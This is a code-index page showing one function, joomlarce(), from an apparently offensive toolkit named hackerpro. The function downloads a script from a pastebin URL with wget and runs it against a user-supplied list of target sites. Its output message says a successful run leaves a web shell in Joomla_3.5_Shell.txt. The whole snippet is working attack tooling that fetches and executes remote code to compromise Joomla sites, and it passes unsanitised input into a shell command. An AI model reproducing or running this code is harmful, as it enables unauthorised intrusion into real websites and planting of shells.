MCPcopy Index your code
hub / github.com/jaykali/hackerpro / joomlarce

Function joomlarce

hackerpro.py:425–430  ·  view source on GitHub ↗
()

Source from the content-addressed store, hash-verified

423
424
425def joomlarce():
426 os.system("wget http://pastebin.com/raw/EX7Gcbxk --output-document=temp.py")
427 clearScr()
428 print("if the response is 200 , you will find your shell in Joomla_3.5_Shell.txt")
429 jmtarget = raw_input("Select a targets list :")
430 os.system("python temp.py %s" % jmtarget)
431
432
433def inurl():

Callers 1

webhackFunction · 0.85

Calls 1

clearScrFunction · 0.85

Tested by

no test coverage detected